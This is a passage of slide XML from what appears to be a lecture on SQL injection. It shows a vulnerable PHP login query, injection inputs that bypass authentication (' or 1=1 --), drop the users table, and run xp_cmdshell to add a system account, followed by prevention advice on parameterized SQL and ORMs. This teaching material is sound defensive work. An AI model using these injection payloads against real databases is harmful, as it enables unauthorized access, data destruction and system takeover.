                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>$pp = $_POST['password']; // </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:hueOff val="114395"/>
                    <a:lumOff val="-24975"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>123</a:t>
            </a:r>
            <a:endParaRPr b="0">
              <a:latin typeface="Courier"/>
              <a:ea typeface="Courier"/>
              <a:cs typeface="Courier"/>
              <a:sym typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr b="1" sz="4200">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:endParaRPr b="0">
              <a:latin typeface="Courier"/>
              <a:ea typeface="Courier"/>
              <a:cs typeface="Courier"/>
              <a:sym typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="4200">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>$sql = "SELECT id FROM users WHERE uid = '$u' AND pwd = '$p'”;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr b="1" sz="4200">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:hueOff val="114395"/>
                    <a:lumOff val="-24975"/>
                  </a:schemeClr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t>//     "SELECT id FROM users WHERE uid = '</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumOff val="-29866"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>' or 1=1 --</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="5E5E5E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> AND pwd…</a:t>
            </a:r>
            <a:r>
              <a:t>”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="4200">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>$rs = $db-&gt;executeQuery($sql);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr b="1" sz="4200">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:hueOff val="914337"/>
                    <a:satOff val="31515"/>
                    <a:lumOff val="-30790"/>
                  </a:schemeClr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t>//    (No Error)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="4200">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>if $rs.count &gt; 0 {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="4200">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>   // </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:hueOff val="914337"/>
                    <a:satOff val="31515"/>
                    <a:lumOff val="-30790"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Success!</a:t>
            </a:r>
            <a:br/>
            <a:r>
              <a:t>}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Causing Damag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>
              <a:defRPr sz="1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/>
            <a:r>
              <a:t>Causing Damage</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="285" name="$u = $_POST[‘login’]; // '; DROP TABLE [users] --…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1689100" y="3513508"/>
            <a:ext cx="21735528" cy="9081109"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr b="1" sz="4200">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="0">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>$u = $_POST[‘login’]; //</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumOff val="-29866"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumOff val="-29866"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumOff val="-29866"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>; DROP TABLE [users] --</a:t>
            </a:r>
            <a:endParaRPr b="0">
              <a:latin typeface="Courier"/>
              <a:ea typeface="Courier"/>
              <a:cs typeface="Courier"/>
              <a:sym typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr b="1" sz="4200">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="0">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>$pp = $_POST['password']; // </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:hueOff val="114395"/>
                    <a:lumOff val="-24975"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>123</a:t>
            </a:r>
            <a:endParaRPr b="0">
              <a:latin typeface="Courier"/>
              <a:ea typeface="Courier"/>
              <a:cs typeface="Courier"/>
              <a:sym typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr b="1" sz="4200">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:endParaRPr b="0">
              <a:latin typeface="Courier"/>
              <a:ea typeface="Courier"/>
              <a:cs typeface="Courier"/>
              <a:sym typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="4200">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>$sql = "SELECT id FROM users WHERE uid = '$u' AND pwd = '$p'”;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr b="1" sz="4200">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:hueOff val="114395"/>
                    <a:lumOff val="-24975"/>
                  </a:schemeClr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t>//     "SELECT id FROM users WHERE uid = '</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumOff val="-29866"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>'DROP TABLE [users]--</a:t>
            </a:r>
            <a:r>
              <a:t>”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="4200">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>$rs = $db-&gt;executeQuery($sql);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr b="1" sz="4200">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:hueOff val="914337"/>
                    <a:satOff val="31515"/>
                    <a:lumOff val="-30790"/>
                  </a:schemeClr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t>// No Error…(and no more users table) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="420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t>if $rs.count &gt; 0 {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="4200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t>   // </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1"/>
              <a:t>Success!</a:t>
            </a:r>
            <a:br/>
            <a:r>
              <a:t>}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MSSQL xp_cmdshell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>
              <a:defRPr sz="1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/>
            <a:r>
              <a:t>MSSQL xp_cmdshell </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="290" name="Microsoft SQL server lets you run arbitrary system commands!…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1689100" y="3513508"/>
            <a:ext cx="21797786" cy="6155515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sz="4600"/>
            </a:pPr>
            <a:r>
              <a:t>Microsoft SQL server lets you run arbitrary system commands!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr b="1" sz="4600">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:satOff val="-15798"/>
                    <a:lumOff val="-17517"/>
                  </a:schemeClr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>
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:hueOff val="114395"/>
                    <a:lumOff val="-24975"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>xp_cmdshell { 'command_string' } [ , no_output ]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="457200">
              <a:lnSpc>
                <a:spcPts val="9100"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="4400"/>
            </a:pPr>
            <a:br/>
            <a:r>
              <a:rPr i="1"/>
              <a:t>“Spawns a Windows command shell and passes in a string for execution. </a:t>
            </a:r>
            <a:br>
              <a:rPr i="1"/>
            </a:br>
            <a:r>
              <a:rPr i="1"/>
              <a:t>Any output is returned as rows of text.”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Escaping Database Server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>
              <a:defRPr sz="1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/>
            <a:r>
              <a:t>Escaping Database Server </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="295" name="$u = $_POST['login']; // '; exec xp_cmdshell 'net user add usr pwd'--…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1689100" y="3513508"/>
            <a:ext cx="21735528" cy="9081109"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="808990">
              <a:spcBef>
                <a:spcPts val="700"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr b="1" sz="4116">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="0">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>$u = $_POST['login']; //</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumOff val="-29866"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumOff val="-29866"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumOff val="-29866"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>; exec xp_cmdshell 'net user add usr pwd'--</a:t>
            </a:r>
            <a:endParaRPr b="0">
              <a:latin typeface="Courier"/>
              <a:ea typeface="Courier"/>
              <a:cs typeface="Courier"/>
              <a:sym typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="808990">
              <a:spcBef>
                <a:spcPts val="700"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr b="1" sz="4116">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="0">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>$pp = $_POST['password']; // </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:hueOff val="114395"/>
                    <a:lumOff val="-24975"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>123</a:t>
            </a:r>
            <a:endParaRPr b="0">
              <a:latin typeface="Courier"/>
              <a:ea typeface="Courier"/>
              <a:cs typeface="Courier"/>
              <a:sym typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="808990">
              <a:spcBef>
                <a:spcPts val="700"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr b="1" sz="4116">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:endParaRPr b="0">
              <a:latin typeface="Courier"/>
              <a:ea typeface="Courier"/>
              <a:cs typeface="Courier"/>
              <a:sym typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="808990">
              <a:spcBef>
                <a:spcPts val="700"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="4116">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>$sql = "SELECT id FROM users WHERE uid = '$u' AND pwd = '$p'”;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="808990">
              <a:spcBef>
                <a:spcPts val="700"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr b="1" sz="4116">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:hueOff val="114395"/>
                    <a:lumOff val="-24975"/>
                  </a:schemeClr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t>//     "SELECT id FROM users WHERE uid = '</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumOff val="-29866"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>';</a:t>
            </a:r>
            <a:br>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumOff val="-29866"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumOff val="-29866"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>        exec xp_cmdshell 'net user add usr pwd123'-- "</a:t>
            </a:r>
            <a:endParaRPr b="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="808990">
              <a:spcBef>
                <a:spcPts val="700"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr b="1" sz="4116">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:hueOff val="114395"/>
                    <a:lumOff val="-24975"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="808990">
              <a:spcBef>
                <a:spcPts val="700"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="4116">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>$rs = $db-&gt;executeQuery($sql);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="808990">
              <a:spcBef>
                <a:spcPts val="700"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr b="1" sz="4116">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:hueOff val="914337"/>
                    <a:satOff val="31515"/>
                    <a:lumOff val="-30790"/>
                  </a:schemeClr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t>// No Error…(and with a resulting local system account) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="808990">
              <a:spcBef>
                <a:spcPts val="700"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="4116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t>if $rs.count &gt; 0 {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="808990">
              <a:spcBef>
                <a:spcPts val="700"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="4116">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF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t>   // </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1"/>
              <a:t>Success!</a:t>
            </a:r>
            <a:br/>
            <a:r>
              <a:t>}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Preventing SQL Injection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>
              <a:defRPr sz="1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/>
            <a:r>
              <a:t>Preventing SQL Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="300" name="Never trust user input (particularly when constructing a command)…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1689100" y="3513508"/>
            <a:ext cx="21005800" cy="7041948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2800"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumOff val="-29866"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Never trust user input</a:t>
            </a:r>
            <a:r>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1"/>
              <a:t>particularly</a:t>
            </a:r>
            <a:r>
              <a:t> when constructing a command)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="2800"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t>     Never manually build SQL commands yourself!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buSzTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t>There are tools for safely passing user input to databases:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1143000">
              <a:spcBef>
                <a:spcPts val="3200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:t>Parameterized (AKA Prepared) SQL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1143000">
              <a:spcBef>
                <a:spcPts val="3200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:t>ORM (Object Relational Mapper) -&gt; uses Prepared SQL internally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Parameterized SQL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>
              <a:defRPr sz="1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/>
            <a:r>
              <a:t>Parameterized SQL</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="305" name="Parameterized SQL allows you to send query and arguments separately to server…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1689100" y="3513508"/>
            <a:ext cx="21823586" cy="8093876"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="800735">
              <a:spcBef>
                <a:spcPts val="5700"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="4656"/>
            </a:pPr>
            <a:r>
              <a:t>Parameterized SQL allows you to send query and arguments separately to server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="800735">
              <a:spcBef>
                <a:spcPts val="5600"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="3492">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>sql = “INSERT INTO users(name, email) </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:hueOff val="114395"/>
                    <a:lumOff val="-24975"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>VALUES(?,?)</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:br>
              <a:rPr>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>cursor.execute(sql, ['Dan Boneh', ‘dabo@hkust.edu'])</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Courier"/>
              <a:ea typeface="Courier"/>
              <a:cs typeface="Courier"/>
              <a:sym typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="800735">
              <a:spcBef>
                <a:spcPts val="5600"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="3492">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>sql = "SELECT * FROM users WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:hueOff val="114395"/>
                    <a:lumOff val="-24975"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>email = ?</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>" </a:t>
            </a:r>
            <a:br>
              <a:rPr>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>cursor.execute(sql, [‘zakird@hkust.edu'])</a:t>
            </a:r>
            <a:br/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="800735">
              <a:spcBef>
                <a:spcPts val="4000"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="4656"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1"/>
              <a:t>Benefit 1: </a:t>
            </a:r>
            <a:r>
              <a:t>No need to escape untrusted data — server handles behind the scenes </a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
